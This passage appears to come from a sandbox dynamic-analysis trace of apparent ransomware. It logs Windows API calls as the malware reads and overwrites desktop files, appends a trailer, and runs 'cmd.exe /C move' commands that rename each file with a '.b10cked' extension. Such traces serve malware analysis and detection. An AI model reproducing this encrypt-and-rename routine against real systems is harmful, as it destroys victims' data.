0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x6b94 [0219.400] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.401] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x66ac [0219.401] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.401] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.401] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x6b94 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.402] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x6b94 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.402] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x35c9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x35c9, lpOverlapped=0x0) returned 1 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.402] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x35c9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x35c9, lpOverlapped=0x0) returned 1 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-13769, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x35cb [0219.402] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x35c9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x35c9, lpOverlapped=0x0) returned 1 [0219.402] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-13769, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x35cb [0219.402] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x35c9, lpNumberOfBytesWritten=0x12ec1c, 
lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x35c9, lpOverlapped=0x0) returned 1 [0219.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="6UVpef.wav", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0219.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="6UVpef.wav", cchWideChar=10, lpMultiByteStr=0x131322c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6UVpef.wav", lpUsedDefaultChar=0x0) returned 10 [0219.406] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x6b94 [0219.406] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.406] CloseHandle (hObject=0x1b4) returned 1 [0219.407] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav") returned 0x23 [0219.429] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.429] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\6UVpef.wav.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xcb0, dwThreadId=0xeb8)) returned 1 [0219.448] CloseHandle (hObject=0x120) returned 1 [0219.448] CloseHandle (hObject=0x1b4) returned 1 [0219.448] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.448] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.448] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.448] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.448] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.448] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.448] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.448] ReleaseMutex (hMutex=0xf8) returned 1 [0219.449] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.449] ReleaseMutex (hMutex=0xf8) returned 1 [0219.449] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.449] ReleaseMutex (hMutex=0xf8) returned 1 [0219.449] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.449] ReleaseMutex 
(hMutex=0xf8) returned 1 [0219.449] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9p6yb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27623829239) returned 1 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.449] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.449] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c05 [0219.450] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.451] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1271d [0219.451] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.452] SetFilePointer 
(in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x12c05 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x12c05 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.452] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9601, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9601, lpOverlapped=0x0) returned 1 [0219.452] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.452] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x9601, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x9601, lpOverlapped=0x0) returned 1 [0219.453] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-38401, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9604 [0219.453] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9601, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9601, lpOverlapped=0x0) returned 1 [0219.453] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-38401, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9604 [0219.453] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x9601, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x9601, lpOverlapped=0x0) returned 1 [0219.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="95ICx9P6yb.bmp", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0219.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="95ICx9P6yb.bmp", cchWideChar=14, lpMultiByteStr=0x13131ec, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="95ICx9P6yb.bmp", lpUsedDefaultChar=0x0) returned 14 [0219.457] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x12c05 [0219.457] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.458] CloseHandle (hObject=0x1b4) returned 1 [0219.458] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP") returned 0x25 [0219.459] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.459] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x918, dwThreadId=0xcd8)) returned 1 [0219.462] CloseHandle (hObject=0x120) returned 1 [0219.462] CloseHandle (hObject=0x1b4) returned 1 [0219.462] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.462] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.462] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.462] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: 
lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.462] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.462] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.462] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.462] ReleaseMutex (hMutex=0xf8) returned 1 [0219.462] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.462] ReleaseMutex (hMutex=0xf8) returned 1 [0219.462] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.462] ReleaseMutex (hMutex=0xf8) returned 1 [0219.462] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.462] ReleaseMutex (hMutex=0xf8) returned 1 [0219.463] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\9CDgy bLN0e-uZnqSYBc.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\9cdgy bln0e-uznqsybc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4db8 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.463] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27625202627) returned 1 [0219.463] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
